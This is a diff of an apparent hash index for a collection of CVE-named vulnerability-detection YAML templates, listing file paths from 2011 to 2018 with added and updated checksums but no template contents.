+603,17 @@ http/cves/2011/CVE-2011-5106.yaml:62df63db6c38bc69ee30e592ef896b832182291b http/cves/2011/CVE-2011-5107.yaml:73533fe2bb67c9f5a82c8fe6ef5740613743bcd1 http/cves/2011/CVE-2011-5179.yaml:41737868cece39bce96526f004ea79a2fdcf0947 http/cves/2011/CVE-2011-5181.yaml:eac3c03adfe37a296a3230a96531e7c1c3d1d5bf +http/cves/2011/CVE-2011-5252.yaml:4bc077a3a0aba9194d862504bd05754801042ae2 http/cves/2011/CVE-2011-5265.yaml:2beebb43998120b5b88b759ac765f58db16723af http/cves/2012/CVE-2012-0392.yaml:5e0febd8bd2ca4fdea24bc503e976e0c3c4c24ea -http/cves/2012/CVE-2012-0394.yaml:18a7f03940a364be373fc84c1453421bfa99d488 +http/cves/2012/CVE-2012-0394.yaml:55e9773e0fa82aa6b65ccb9c27d8b4c81c80be25 http/cves/2012/CVE-2012-0896.yaml:2e9d00e27db531a60ca9aa5241c9140e57021eee http/cves/2012/CVE-2012-0901.yaml:e41c1bb136bc284959b0ec26833a3bbad5435d9c http/cves/2012/CVE-2012-0981.yaml:f7dda71224a8b2b69f20cb4a88eb8ea2e35a0a53 http/cves/2012/CVE-2012-0991.yaml:e5e1658570de4a279923edfc204d31115f87012c http/cves/2012/CVE-2012-0996.yaml:778e58803bba95c3fdb02650fc228cc42b28b561 http/cves/2012/CVE-2012-1226.yaml:da32f78faa398aad8e1308ffe9993a7588e2a383 -http/cves/2012/CVE-2012-1823.yaml:869bd1b93ce8ba6fb79a7fde006fa39ffe9cfda0 +http/cves/2012/CVE-2012-1823.yaml:9ae8ab2f3370935efc1abfe02c0b2b322eb51ae7 http/cves/2012/CVE-2012-1835.yaml:34dc1f0bc3f481b4c8d4088b4d59d2616bfb9291 http/cves/2012/CVE-2012-2371.yaml:ebfd4520c731e54356a74a00b88941554badb0ca http/cves/2012/CVE-2012-3153.yaml:ebf48c069f89faee767673e6705715be60afcc3a @@ -592,26 +625,29 @@ http/cves/2012/CVE-2012-4768.yaml:eede45d899f4df7a6c4ea37af40214edfcbf3635 http/cves/2012/CVE-2012-4878.yaml:8b835957f681819c6a98ee5d0c8dfab241f0d215 http/cves/2012/CVE-2012-4889.yaml:b94729905c1eb7527864aac08d9fe12ec43dac86 http/cves/2012/CVE-2012-4940.yaml:ad96fe92c5108ab23e46211fe893ac7df8baa78e +http/cves/2012/CVE-2012-4982.yaml:edd0146a6beac65161aa4074a99ba6c4e4d325cc http/cves/2012/CVE-2012-5913.yaml:b0ddd82e2ce5a8628df761041d1b4280aeecd00b +http/cves/2012/CVE-2012-6499.yaml:522ad7554dd76fbb2e125c7da7aef0e42b6e129d http/cves/2013/CVE-2013-1965.yaml:babc668e22e6d8704ce7cf798fb454f22d32c604 http/cves/2013/CVE-2013-2248.yaml:7d0503d1be8337527e505bf906f8caec7de56a4e http/cves/2013/CVE-2013-2251.yaml:27cf22446500d19319624be2af88407bfa933aa6 http/cves/2013/CVE-2013-2287.yaml:e109ecf43312434cc4d37d6749ba838f0f9b8843 +http/cves/2013/CVE-2013-2621.yaml:0b9120ad044fbfdd046cd3319fa714c202bf4094 http/cves/2013/CVE-2013-3526.yaml:721d716989b08654ce88cf0f99c395bfc5488090 http/cves/2013/CVE-2013-3827.yaml:9febc5d0a547c2897d6836fbe753a49f7bcc4fe0 http/cves/2013/CVE-2013-4117.yaml:eb639422cbffb1d20cd8198369444f96ea430c92 http/cves/2013/CVE-2013-4625.yaml:3c0648bacdd03cf0ae6edd3bc216b52f25c2f3d8 http/cves/2013/CVE-2013-5528.yaml:d9c8819070dc7e03b8423d3dc825e8ae903137d1 http/cves/2013/CVE-2013-5979.yaml:51e7b8edac8792d2b53ec8ff2a77da0141056f48 -http/cves/2013/CVE-2013-6281.yaml:8e90fdec7bd9330d5f1c0abbde04db1989ad4e1e +http/cves/2013/CVE-2013-6281.yaml:ced1ba91bcd4fb3f990d1eb68249a596e2b9126c http/cves/2013/CVE-2013-7091.yaml:55341b568250b4ccafbe6a75fd18f428d7fd767d http/cves/2013/CVE-2013-7240.yaml:5d70e14e5e86f3ef984d0df87cb265f24ad1213a -http/cves/2013/CVE-2013-7285.yaml:1f4f8c3102bda98c6526cb9a8ab264cc42debdef +http/cves/2013/CVE-2013-7285.yaml:846bc6cb18a2908724298dcc17df8e52449dc001 http/cves/2014/CVE-2014-10037.yaml:d4ec17200e05d886d2427d789cd500c9a6aa3425 http/cves/2014/CVE-2014-1203.yaml:d797f9e64a9d2422e78fa43e31ac053c4fbe84e9 http/cves/2014/CVE-2014-2321.yaml:4a112b63fe91fa96ecaa65f2f444bf2814e926a5 http/cves/2014/CVE-2014-2323.yaml:c1ad92dece25fee60d1d837b61a49afeed99813f -http/cves/2014/CVE-2014-2383.yaml:c0592a7d5b666b6bda2fc4826858c9198480d85b +http/cves/2014/CVE-2014-2383.yaml:86740d5e93e0406cd6d47723e903e370972ffba8 http/cves/2014/CVE-2014-2908.yaml:597eff7421cb0b9e20560ce1f71c81644ac9c195 http/cves/2014/CVE-2014-2962.yaml:78e51ce56a0ac86968edce321f111b0162052854 http/cves/2014/CVE-2014-3120.yaml:3fe8aa4908b5c1304b089758c57edbf069e118b8 @@ -634,7 +670,7 @@ http/cves/2014/CVE-2014-5111.yaml:6757172e40eb4eaf6d9f19f1b5550d934549e832 http/cves/2014/CVE-2014-5258.yaml:c5194ef347733c6fe05d69e6c371ca1dcb996cea http/cves/2014/CVE-2014-5368.yaml:618741cc501e219392d4da5437c1c23104ae0938 http/cves/2014/CVE-2014-6271.yaml:d4e288900662cb4e924c03a6d7fb2cbbcdb37a59 -http/cves/2014/CVE-2014-6287.yaml:98f61b465e93ca074d1635b6430b5981c17f8ffe +http/cves/2014/CVE-2014-6287.yaml:613d456b9d61b02a418e209726795f236847110e http/cves/2014/CVE-2014-6308.yaml:aa2b869cf95cab640ba6aaea3f9abbb019e5fd4c http/cves/2014/CVE-2014-8676.yaml:abaca5b7ee9dc704d2e931afa2ea6e113110fa37 http/cves/2014/CVE-2014-8682.yaml:7fc37672f2a5960b7e846f2f3a912baa6c74699d @@ -657,24 +693,24 @@ http/cves/2015/CVE-2015-1000012.yaml:aaea7063930a52264b37dafa1cec49e67f62395b http/cves/2015/CVE-2015-1427.yaml:0238c6f98ef7506ab65e46caf6fc23d3dfaa97a2 http/cves/2015/CVE-2015-1503.yaml:1d995530d0deee3051b6fa50a38e7430b0c4bb25 http/cves/2015/CVE-2015-1579.yaml:6caafb7514ff78f7082f8c4099df16f33274a856 -http/cves/2015/CVE-2015-1880.yaml:1f78ce7fcd21f0fab45141580d6fe4ebb3c1cccb +http/cves/2015/CVE-2015-1880.yaml:484e73c7c65155926c7b057f101e79271cfb5b92 http/cves/2015/CVE-2015-2067.yaml:fe895e5104c650be59af8c6a0004a27cfcbcc36d -http/cves/2015/CVE-2015-2068.yaml:ed5d3bcdb515dc16d3cc089a19cc0484bf2bb089 +http/cves/2015/CVE-2015-2068.yaml:9a52b84fb25e881c66abbb32c044a71d5d180de5 http/cves/2015/CVE-2015-2080.yaml:1cbe7382f84bf8211bfc818b0c3fa725ffd8765b http/cves/2015/CVE-2015-2166.yaml:1f103b0227437d14caef90ad25ffc035063fa0d2 -http/cves/2015/CVE-2015-2196.yaml:4969ceed7e1b6258f02fdd7b9fa790b68cbdd0d3 -http/cves/2015/CVE-2015-2755.yaml:2ee9936c62301ec665550a15390fcf853b744a12 +http/cves/2015/CVE-2015-2196.yaml:9b21cd2fe21ef6282bf4d2c6454364ffb5476e70 +http/cves/2015/CVE-2015-2755.yaml:94f949d122bec79c5bfe3ed7b1f74e1d9de16453 http/cves/2015/CVE-2015-2807.yaml:5f45af660bdb564d7b19d60e3d1459f53368df70 http/cves/2015/CVE-2015-2863.yaml:5d7fbce5a57ad9f31ba52cf0827da1441001b9e6 http/cves/2015/CVE-2015-2996.yaml:98f400c774637684c2da791203cc15bd665e1acc -http/cves/2015/CVE-2015-3035.yaml:ada7f343bc4da7bfa916071571f4f5b483592e59 +http/cves/2015/CVE-2015-3035.yaml:e67fc66369e4be9e2f8d21e50b1a5000853acf2d http/cves/2015/CVE-2015-3224.yaml:2486456c060bdbbb3aa5ebf40f36e5a147fa68f3 http/cves/2015/CVE-2015-3337.yaml:0a2ca418d230424c9f030389e91185e36e319a62 http/cves/2015/CVE-2015-3648.yaml:5b97660133aa171d6900190cb3cf1833da8c4d88 http/cves/2015/CVE-2015-3897.yaml:2e58a0d6ea3fc86de4bf3185829e1ce10bce258e http/cves/2015/CVE-2015-4050.yaml:1c3a629652d82309a8d5df324ce53426823ee175 -http/cves/2015/CVE-2015-4062.yaml:10269255ff40fb6b297650a55caa1a5388bbb588 -http/cves/2015/CVE-2015-4063.yaml:06b7bd95816543cf7134cf31a50e9225d47823e0 +http/cves/2015/CVE-2015-4062.yaml:3fb3653aad608dd0da03accb4353aaf62c0ff4da +http/cves/2015/CVE-2015-4063.yaml:0e27bdc015ce68787bf14cf6f9d41b96479a4fcc http/cves/2015/CVE-2015-4074.yaml:34b0bbd729dc3d41f8e6382961dfbe74a8c80016 http/cves/2015/CVE-2015-4127.yaml:9686ce65bff6a5b8388602099f8dc8576f8d7f11 http/cves/2015/CVE-2015-4414.yaml:182d73cebb2c29618de45a5361b5236fd75f5560 @@ -700,7 +736,7 @@ http/cves/2015/CVE-2015-7823.yaml:6a07ed9198ab50bf1861c259c1bd934ccddc578d http/cves/2015/CVE-2015-8349.yaml:cb0a3975d9d4520b1d668738be9cc4ba3cf8231d http/cves/2015/CVE-2015-8399.yaml:8a32ea6d70a8f8ff5d0618e223a7420db13c09c3 http/cves/2015/CVE-2015-8813.yaml:2a3cd7a262f936c7732e99e8e479ef352185da4e -http/cves/2015/CVE-2015-9312.yaml:e8e54d5475c264845788048ac4f5986034c44a60 +http/cves/2015/CVE-2015-9312.yaml:8932b5ccd1d871ee79be9b4c40f52649512c8078 http/cves/2015/CVE-2015-9414.yaml:cdac64ec0a96fa0ff613979139f469f5374b4996 http/cves/2015/CVE-2015-9480.yaml:c47daf3d68a7900fdf1dbe5d468357811f3cc7e4 http/cves/2016/CVE-2016-0957.yaml:fb5200cbbb3791588e0d459db08bd04677d99cb1 @@ -731,7 +767,7 @@ http/cves/2016/CVE-2016-1000154.yaml:5852cdbca49c999b7965730daa624bac9f9edd34 http/cves/2016/CVE-2016-1000155.yaml:74ed09324845c739b27b08377fb2cede7a9d77d8 http/cves/2016/CVE-2016-10033.yaml:90534c75a6bd6c38856c1e5300db5bd2040880f5 http/cves/2016/CVE-2016-10134.yaml:c01660b78a76141574a23156bded4ee5217a5ba4 -http/cves/2016/CVE-2016-10367.yaml:a471e974b9c82d167a82d495a92e40e7e0b9d3fc +http/cves/2016/CVE-2016-10367.yaml:848c6524352c194e4e53cc4257d25c76e195e5c7 http/cves/2016/CVE-2016-10368.yaml:0977411d167e134354d5481cfb975d038c1c01bc http/cves/2016/CVE-2016-10924.yaml:3f3d43c24020739d8c972a56557b73ea2b47d3f2 http/cves/2016/CVE-2016-10940.yaml:66c53f646bc717340c622f40612567fa75aae246 @@ -741,12 +777,13 @@ http/cves/2016/CVE-2016-10993.yaml:1cc6fe89f03785c62697e0c4dee86a5901eb53b6 http/cves/2016/CVE-2016-1555.yaml:e1fa5dee19721b46b5636aa1d0f3279481c7a44d http/cves/2016/CVE-2016-2389.yaml:c3006d5c6d35c3901fc173ab30a9b67fc02275f7 http/cves/2016/CVE-2016-3081.yaml:88c300610c0c841aee2602b2f30c1d5f5f6c90bb -http/cves/2016/CVE-2016-3088.yaml:49b481b93eb538dabf2f01a66309d9f6c779c57e +http/cves/2016/CVE-2016-3088.yaml:1229823bd193d48dc72f8d3be3124020e1913fc9 http/cves/2016/CVE-2016-3978.yaml:3328c40c88e9da601b3b312b101bbbc21c401a98 -http/cves/2016/CVE-2016-4437.yaml:de1ca2332ce6797169a5b3321d3ba1292f1e120a +http/cves/2016/CVE-2016-4437.yaml:dc46f9dc5b67af371fbbac88f7a96e978e278845 http/cves/2016/CVE-2016-4975.yaml:c31e2b9cf4cf61d17895569fed0d4c552a5e3b72 http/cves/2016/CVE-2016-4977.yaml:b57a658c0ea52f208c0523c28a1e3e1bf308113e http/cves/2016/CVE-2016-5649.yaml:b861ff276a53779bbc79ff83f340ad95cf73d394 +http/cves/2016/CVE-2016-6195.yaml:6fea1eb939faed061414577f1d2f5b7aac952000 http/cves/2016/CVE-2016-6277.yaml:825821d6dfe7227ce02c0b1d5451e0dcf4fcabe7 http/cves/2016/CVE-2016-6601.yaml:0056ffce14a7b9396adb2b20530d3c5d9ab755a3 http/cves/2016/CVE-2016-7552.yaml:af748d0296b2e06fe9a52e8eb2c3923c85ee2ae8 @@ -759,15 +796,15 @@ http/cves/2017/CVE-2017-1000029.yaml:56f1dc6d9d33e1991a3353034fb6d82811d23353 http/cves/2017/CVE-2017-1000163.yaml:3ea8f704a363596a99e1654e6e48450a5b6dde58 http/cves/2017/CVE-2017-1000170.yaml:76f4dff15c6e88a662e9047ed7f473b0284deed9 http/cves/2017/CVE-2017-1000486.yaml:ea39aca9110928772473d5604e30d23d431fb57d -http/cves/2017/CVE-2017-10075.yaml:933dc840854b0ced1708d0457e695313945129e8 +http/cves/2017/CVE-2017-10075.yaml:351fb02ad0c7e72e08e0685ae0c9da70401092ed http/cves/2017/CVE-2017-10271.yaml:082863d9d30fe7e425d457713606b7913cdf96d4 http/cves/2017/CVE-2017-10974.yaml:9586d906dea96147909756849bc21b8ce76ebd1b -http/cves/2017/CVE-2017-11165.yaml:dc6e1b60682ec6a3bc9bc1c23b20029c14b3a4d4 +http/cves/2017/CVE-2017-11165.yaml:05ee4b5c3042bd4f50e20e4ee6b0016d3fe1438e http/cves/2017/CVE-2017-11444.yaml:0893609b58d513e6778987e6dde47d2ba57ac514 -http/cves/2017/CVE-2017-11512.yaml:7ce5898cb3821f4a1214a268f954ef30d20766a9 -http/cves/2017/CVE-2017-11586.yaml:31655842e34dd6f7a8f60db886837411f6bd5c7e +http/cves/2017/CVE-2017-11512.yaml:5f7380f2144caeaf10e9db8c4bb68216e3c3a1cf +http/cves/2017/CVE-2017-11586.yaml:95e4d006e26efef9bf4eda85febfb4ff96847c37 http/cves/2017/CVE-2017-11610.yaml:a9807e9e66f3ed43922d45db7bab3006d30c9ef1 -http/cves/2017/CVE-2017-11629.yaml:ba15e33753cececf2c33c98b7fd26c4f3fb62182 +http/cves/2017/CVE-2017-11629.yaml:e921343db2164fa615ecf0c431dfa8c0984adab8 http/cves/2017/CVE-2017-12138.yaml:ac9c47cc1518ecf652f7250f8856a5db120638a2 http/cves/2017/CVE-2017-12149.yaml:73c35ea9855e51f8e0aba33001326ade664c898e http/cves/2017/CVE-2017-12542.yaml:8ad0adbb231a886f9c3598aaa80f6d1a9c7a8dd3 @@ -775,16 +812,17 @@ http/cves/2017/CVE-2017-12544.yaml:175b419d781f89ea852d8f6b75bb3f753cebdbbc http/cves/2017/CVE-2017-12583.yaml:e76f5dcd9af79f47aacc06203f141424a2d5e0fb http/cves/2017/CVE-2017-12611.yaml:922b5324212b417f8292ce1263e14351569ab461 http/cves/2017/CVE-2017-12615.yaml:f9094128fab304c4284351edbe8bcfa4d8cc5070 +http/cves/2017/CVE-2017-12617.yaml:1b2d376433632693d5ccf4cd62fadaa5c6f4eef6 http/cves/2017/CVE-2017-12629.yaml:856821d61fc3c8943a6ec07e0cbf58b5214be3ee http/cves/2017/CVE-2017-12635.yaml:23d885c9b0bc5d4d3355f38788684d52ba2ba862 http/cves/2017/CVE-2017-12637.yaml:eb79d7e96b55bf793dc9392394ca7c41df6c1a6f http/cves/2017/CVE-2017-12794.yaml:894a78634745a021e842f1979457fd5bde8309e5 http/cves/2017/CVE-2017-14135.yaml:6b7ce25bbb367d691cd8e4bcd776cc84f2f7eded -http/cves/2017/CVE-2017-14186.yaml:13483ba26b5950eef9daa10758f48ecf8f477dff +http/cves/2017/CVE-2017-14186.yaml:42dd996ce75ec7dd22b0c10797dcadfbf030730c http/cves/2017/CVE-2017-14524.yaml:f86bf454230b866059674cb379417cd86eca14ff http/cves/2017/CVE-2017-14535.yaml:e673813375daa97f0255566e147406d850062b0a http/cves/2017/CVE-2017-14537.yaml:3bd7f8c2bd802137fcffed2a7829dd6b87f9df1b -http/cves/2017/CVE-2017-14622.yaml:c7006a16b49215853ba40bec1a8980e786853392 +http/cves/2017/CVE-2017-14622.yaml:9a3a2f5582d68236642cc91544da75d762bb6cc2 http/cves/2017/CVE-2017-14651.yaml:93b3c0c7ad29f9c6927abcf6102d5ab8c3101037 http/cves/2017/CVE-2017-14849.yaml:f8fe3531a90025f2464a72474d1eb40ab85f7445 http/cves/2017/CVE-2017-15287.yaml:1f4c62130aee8bb9f471479a904b1fe0563840b3 @@ -794,13 +832,13 @@ http/cves/2017/CVE-2017-15715.yaml:347f54b58b7279a20c497abf9f9e59e47f303c6c http/cves/2017/CVE-2017-15944.yaml:ab8873fe218a34c0ef29dda41d8d316a6fca2445 http/cves/2017/CVE-2017-16806.yaml:85f9d2501624970820e4938e00d3fde9a04530d1 http/cves/2017/CVE-2017-16877.yaml:c19cf49f3d48ae5f5a3509a20130107ca156c0a6 -http/cves/2017/CVE-2017-16894.yaml:1e27539f9bbf83502446f790a667a162f4bf8d9c +http/cves/2017/CVE-2017-16894.yaml:488d32cb10d68c951476840065c09de362bcbe55 http/cves/2017/CVE-2017-17043.yaml:fd50cf646420eb8486de49ff5fc69d633e50b24e http/cves/2017/CVE-2017-17059.yaml:849cc1a303bb2e88c333d50ef163a2b57e1eb611 http/cves/2017/CVE-2017-17451.yaml:f310e809fac25bac71952a5e51953e068311fe1d http/cves/2017/CVE-2017-17562.yaml:a32a7c5aa1f09b222fa0bb67ad67200e9e0d8cb6 -http/cves/2017/CVE-2017-17731.yaml:e084c24499ccec3819043174d98cd4bd408f8d91 -http/cves/2017/CVE-2017-17736.yaml:b0b13f895f6d47653f387d3a080f417690cd4115 +http/cves/2017/CVE-2017-17731.yaml:7448440ba15ad2229bda586f8057c5c40c9e7461 +http/cves/2017/CVE-2017-17736.yaml:48c86673815888dd8136428145ee842d80a3a8a9 http/cves/2017/CVE-2017-18024.yaml:5f2310dbb6a722423eed4e581d6506e8af304ce8 http/cves/2017/CVE-2017-18536.yaml:4978ca65e54db6ca38578af479d7a611c3d37deb http/cves/2017/CVE-2017-18598.yaml:1f38be6cf6d35f18b2413dbd025bbec6898b0326 @@ -808,23 +846,23 @@ http/cves/2017/CVE-2017-18638.yaml:44c4e48ab6119f12e7c9b47d112d00f57ff8a58c http/cves/2017/CVE-2017-3506.yaml:0933022be7805e458cc0d68f6e0e43ed6d6478f2 http/cves/2017/CVE-2017-3528.yaml:a3a85151e8d698806472069b580bd187d7d197ab http/cves/2017/CVE-2017-4011.yaml:167dcb7e8a03f1c0d4e585fb273eb33885e5c24d -http/cves/2017/CVE-2017-5487.yaml:bd65b895616af68174afb2aeacc7429946579c24 +http/cves/2017/CVE-2017-5487.yaml:02111d8230f57161d17f9a5f3984bcaed9563cb4 http/cves/2017/CVE-2017-5521.yaml:76114b8b0f786746cfc77c16e64553eaceb91ad0 http/cves/2017/CVE-2017-5631.yaml:0f69370d759e590e9b0685b4f10ae7d4b2d2e2b7 -http/cves/2017/CVE-2017-5638.yaml:8ecc07de54d63f431014820f1d89999ea00d8bb5 -http/cves/2017/CVE-2017-5689.yaml:70c30cafdba73024bf0127d5f33b041ed9df3dad +http/cves/2017/CVE-2017-5638.yaml:1fba0de82787af2c4ca0d0e750459e93ac1a09e3 +http/cves/2017/CVE-2017-5689.yaml:7cd7ae17afb47ab81348076a67450c5380c5a50a http/cves/2017/CVE-2017-5982.yaml:b991b6e0e208e20e6e115afb561508844937346f http/cves/2017/CVE-2017-6090.yaml:33f31518225e059a9b85702b3b3fc7f0f8f61707 http/cves/2017/CVE-2017-7269.yaml:6ee6f5c6fb12d779ec4dc6337b6e5429336312b9 http/cves/2017/CVE-2017-7391.yaml:4efe04bc173535835a52ea0db7f94afffb5e20fc http/cves/2017/CVE-2017-7615.yaml:28c2d956681f291bfadb6ef743be0314b7904888 http/cves/2017/CVE-2017-7921.yaml:8d492d6e3b947372fa5d265302b64e605ea7f1ac -http/cves/2017/CVE-2017-8917.yaml:83f9f45b48571c0e89cf307670c3ac21d491d8b6 +http/cves/2017/CVE-2017-8917.yaml:ac6390d1f961a9a1969932e17403939fb8000e54 http/cves/2017/CVE-2017-9140.yaml:01c2f3364b5c2b2b2767a025084add6488690226 http/cves/2017/CVE-2017-9288.yaml:f20e6d72a331c8d57d8eeb63e865c81b336a2f99 -http/cves/2017/CVE-2017-9416.yaml:9db9042d0a0b8440ef3c1e57fe382689f14938d6 +http/cves/2017/CVE-2017-9416.yaml:1ab43c4937e600f73ee194b2910fde8c95801b52 http/cves/2017/CVE-2017-9506.yaml:14cfce197664ea6cad7787d568b58f8f1f3ce048 -http/cves/2017/CVE-2017-9791.yaml:f395d96f7801dfa5df07e0952d2e591e6dbb1b33 +http/cves/2017/CVE-2017-9791.yaml:4cbd11b8d753d95df7974aa62a6438e5daa0a063 http/cves/2017/CVE-2017-9805.yaml:4b809828373de8cde0f86fe1b1c60789bfe3a275 http/cves/2017/CVE-2017-9822.yaml:aac13d49174fda813c682001f3d87a94347b3cce http/cves/2017/CVE-2017-9833.yaml:bbd8df603a03fee1f66086cc8e0ac88b55728fa5 @@ -836,8 +874,8 @@ http/cves/2018/CVE-2018-1000130.yaml:ba5c76592290f39adee2606c699657ceb97aa5ad http/cves/2018/CVE-2018-1000226.yaml:af10a4b002cc09a5800f5d7687ec728f73689102 http/cves/2018/CVE-2018-1000533.yaml:9efb75836e1dda254d3dd2d4852495fcfa332fb6 http/cves/2018/CVE-2018-1000600.yaml:6003a9e4ac50cd7b5aed7fa13c1291e7f610ffb1 -http/cves/2018/CVE-2018-1000671.yaml:07e6356efb55a3f856a0e222f0a8fd78209eda8d -http/cves/2018/CVE-2018-1000856.yaml:a36dcf79beddd406e9d792577980f612a710f478 +http/cves/2018/CVE-2018-1000671.yaml:448f8c0451bab6d12babfed770daf9243ea85539 +http/cves/2018/CVE-2018-1000856.yaml:c2631ddb1648b6904aa78d8332ac5208a422575d http/cves/2018/CVE-2018-1000861.yaml:ef8fe7562788ac3dae22c98e78af08f08ac2dad9 http/cves/2018/CVE-2018-10093.yaml:1f5b631b63f8a43297df4eb185866f77e8e31d87 http/cves/2018/CVE-2018-10095.yaml:5a75e1736c63ae5de580036d246a2c36f4535d1b @@ -849,10 +887,10 @@ http/cves/2018/CVE-2018-10818.yaml:6498291625ef8ef257843ec8273fd2507c58f972 http/cves/2018/CVE-2018-10822.yaml:8d9c246c0c98f744a4e595720de860f47f526ff1 http/cves/2018/CVE-2018-10823.yaml:aaec17f4f1529810836aba2e5fa29a33b47f508b http/cves/2018/CVE-2018-10956.yaml:a83a2500d488ad8d8a28b82f1fd2b27460322537 -http/cves/2018/CVE-2018-11227.yaml:52dc3c2c75f9f93db9771b76eab8dee0bfb039f6 +http/cves/2018/CVE-2018-11227.yaml:b3e5bc5654e6fd2a17ec05b2b5c7d586e5e56404 http/cves/2018/CVE-2018-11231.yaml:69789c788210c192f98c9ada3173b938e388a144 http/cves/2018/CVE-2018-11409.yaml:0d8b7037344835721f8dd38da6050ea8d8915b26 -http/cves/2018/CVE-2018-11473.yaml:a035f286c96e8a93300a75f473080346c9d52d18 +http/cves/2018/CVE-2018-11473.yaml:80fad9b046becd21dcc63f63ed74ce1876a3d200 http/cves/2018/CVE-2018-11709.yaml:16c64a3342c90d85d2a6ebb93aac58166d2b0bb6 http/cves/2018/CVE-2018-11759.yaml:ef8fdd315dd7e186c3ca698af5988e95d3c9e9ed http/cves/2018/CVE-2018-11776.yaml:d15fb8e74019abe7bfe836feecb17a8ff6ce2d80 @@ -865,7 +903,7 @@ http/cves/2018/CVE-2018-12296.yaml:e3c2673f672fbe7f662f01d288ff743ded153378 http/cves/2018/CVE-2018-12300.yaml:fd6a90f33c0682c395092e1835410568b8e8538f http/cves/2018/CVE-2018-12613.yaml:8ec83531191cb88dbbda6bd7e4200a452bde6ba3 http/cves/2018/CVE-2018-12634.yaml:c6d83a21b6c94d7b02f82ed73fd2c3f3031a02fd -http/cves/2018/CVE-2018-12675.yaml:38f4de49893f9aeb78522173a1064b94e9cc0bb3 +http/cves/2018/CVE-2018-12675.yaml:5f93e774ff59c750ccd4b0882eafb82825f45449 http/cves/2018/CVE-2018-1271.yaml:26db9fab8f10736b3c948323a4e9d3ec10f7f533 http/cves/2018/CVE-2018-1273.yaml:52cac66d6c77031c860524de34756486420dbefe http/cves/2018/CVE-2018-12998.yaml:913a59d2c8d7a679084dbee9d5ed82d675c13fc4 @@ -880,7 +918,7 @@ http/cves/2018/CVE-2018-14574.yaml:b6f5f0610bbfb5fe2f60b98113356fce045d1d44 http/cves/2018/CVE-2018-14728.yaml:1353dcdfc2dafb580b0261924a6f5d07c3332fb6 http/cves/2018/CVE-2018-14912.yaml:a4f9c049c3c783fb3275b425c1ad82218fac7238 http/cves/2018/CVE-2018-14916.yaml:86b9eeb057f716547468a4f5656d80f9e15d883f -http/cves/2018/CVE-2018-14918.yaml:a7c251ca8370f52dd04ee4d9ebb51407168ad257 +http/cves/2018/CVE-2018-14918.yaml:fee5070bc5e41f6702cc204d46f0f65221efe077 http/cves/2018/CVE-2018-14931.yaml:13891f650530f5f747312cc3ec9caf852442f038 http/cves/2018/CVE-2018-15138.yaml:e1762bce59146cba5720b9f0f5c64e90fe38398c http/cves/2018/CVE-2018-15517.yaml:f7ade42137cc43d68103d08d93af45eaf725824d @@ -889,8 +927,8 @@ http/cves/2018/CVE-2018-15745.yaml:655497edd72a1c17e19dfb70c39503543feba682 http/cves/2018/CVE-2018-15961.yaml:08829ea728a1c7a3b34a17ea5874d7843f9c40cd http/cves/2018/CVE-2018-16059.yaml:0659dfc86080727aeb5317cc58ab05c298f753c1 http/cves/2018/CVE-2018-16133.yaml:810b6414632460597495045ce699ddfb6f193f48 -http/cves/2018/CVE-2018-16139.yaml:29d0eae9befab2f8f83bc438151ff638c691f932 -http/cves/2018/CVE-2018-16159.yaml:28c99ed563011f96620c568b36c5b633c4d1e1cc +http/cves/2018/CVE-2018-16139.yaml:745e952878320d4d6d06cc2a8631013ec344a759 +http/cves/2018/CVE-2018-16159.yaml:6ad3a674ed8101aecc7567ef09260a8822c399ac http/cves/2018/CVE-2018-16167.yaml:25dfb69b45c8639257014e7f49e72857a5dbdfd0 http/cves/2018/CVE-2018-16283.yaml:29e465b4be243bc62d98c5a45253da8ed1d39907 http/cves/2018/CVE-2018-16288.yaml:dabb3c775815bd0fefc93e7e11d66e0467354923 @@ -903,43 +941,43 @@ http/cves/2018/CVE-2018-16716.yaml:0e92c0d7a52a71f2b40130dba3cd2e476cf12e95 http/cves/2018/CVE-2018-16761.yaml:55d7c04977016d94f6f785d5decca9d9d4d67246 http/cves/2018/CVE-2018-16763.yaml:5763f3b847f4c6a2b8e84df78d651335ff80ee79 http/cves/2018/CVE-2018-16836.yaml:7440b1355d30937fc0a6e46ab87226397e5012d3 -http/cves/2018/CVE-2018-16979.yaml:ca5bbc8732b5ba5ae9f7569e7d4ea2ae40dc26f0 +http/cves/2018/CVE-2018-16979.yaml:0dcd321aa2d8ed966629ae9177fe26e6537257dc http/cves/2018/CVE-2018-17246.yaml:b5a9a529b1e59025c60bbf6b177a3aaf21ed751d http/cves/2018/CVE-2018-17254.yaml:89aa84135f4d2a42387cb27eae3d11bfa7188174 http/cves/2018/CVE-2018-17422.yaml:c0d5cc799fbc5cf968c1958d7472e0b94b8a7a4f http/cves/2018/CVE-2018-17431.yaml:87feaf1d0e3cd1c3ccc23aba7d742b72977ae2e8 -http/cves/2018/CVE-2018-18069.yaml:d5c97685a46f93f0efc229e00b50da5089f1c88b +http/cves/2018/CVE-2018-18069.yaml:f4f7c4d37c5ed2db43c609d214811eb606c9de2e http/cves/2018/CVE-2018-18264.yaml:e53cfe2ca1e8a1bfb73bd150e7aa4a3c40f5d2fe http/cves/2018/CVE-2018-18323.yaml:b6f3792109d71c9144732648b256c8a16a083f0e http/cves/2018/CVE-2018-18570.yaml:a7faf0336410cec0ed1562858c7eee499f1d22f7 -http/cves/2018/CVE-2018-18608.yaml:69f9430c96ba7bd0306e56f25f94de837f7d4b14 +http/cves/2018/CVE-2018-18608.yaml:353d45f3d62809b6587cd71979d7a038a232fc96 http/cves/2018/CVE-2018-18775.yaml:5dab36ab069030d9bb8a02c9c8fda0deb4825448 http/cves/2018/CVE-2018-18777.yaml:2dba96590cc6a6f58441542f0a286defe8b2c126 http/cves/2018/CVE-2018-18778.yaml:06c0a3f12f5c4ea1643a7f4c4ddd979de5aebe83 http/cves/2018/CVE-2018-18925.yaml:e97abb53ad8dca0160ceaf8070e067fe37561772 -http/cves/2018/CVE-2018-19136.yaml:b0024320c0932d673597487cf2775f7b3e00e883 -http/cves/2018/CVE-2018-19137.yaml:85f2f9fa062cf5684516c5cf13004a00e920c243 -http/cves/2018/CVE-2018-19287.yaml:0511aa8cc615337379617603733dc524fc42d5d1 +http/cves/2018/CVE-2018-19136.yaml:70e20c24061c8c0998cc9acfe3cb5179a611d908 +http/cves/2018/CVE-2018-19137.yaml:fe19909327070db9362f0c001072f65f32ba0df5 +http/cves/2018/CVE-2018-19287.yaml:52a870f27bf2b6f0e9f440065458dae5405fcc07 http/cves/2018/CVE-2018-19326.yaml:e81cb3cfdaccb565693c6e742896735584e77e49 http/cves/2018/CVE-2018-19365.yaml:800459337af8a592f8ff207af27aa47121e19a43 http/cves/2018/CVE-2018-19386.yaml:f8f2b877d2fa91ac11ce75248b2b814816359e7d 